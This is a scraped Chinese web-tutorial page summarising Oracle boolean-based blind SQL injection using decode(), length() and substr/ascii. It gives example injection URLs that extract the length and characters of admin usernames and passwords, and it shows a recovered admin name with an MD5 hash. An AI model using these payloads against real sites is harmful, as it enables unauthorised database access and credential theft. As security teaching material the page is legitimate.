Oracle基于布尔的盲注总结
发布时间:2021-03-12 14:07:28 所属栏目:站长百科 来源:网络整理
导读:0x01 decode?函数布尔盲注 decode (字段或字段的运算,值1,值2,值3) 这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3 当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多 使用方法: 比较大小 selec
先获取数据长度 http://www.jsporcle.com/news.jsp?id=1 and 37=(select length(username%7c%7cpassword) from admin)-- select * from art where id=1 and 37=(select length(username||password) from admin); 猜解ascii码 http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1)) from admin)=97 -- ? 同样?burp或脚本爆破即可 ? ? ?猜解结果:? admine10adc3949ba59abbe56e057f20f883e (编辑:ASP站长) 【免责声明】本站内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。 |
相关内容
未处理完善
-
无相关信息
最新更新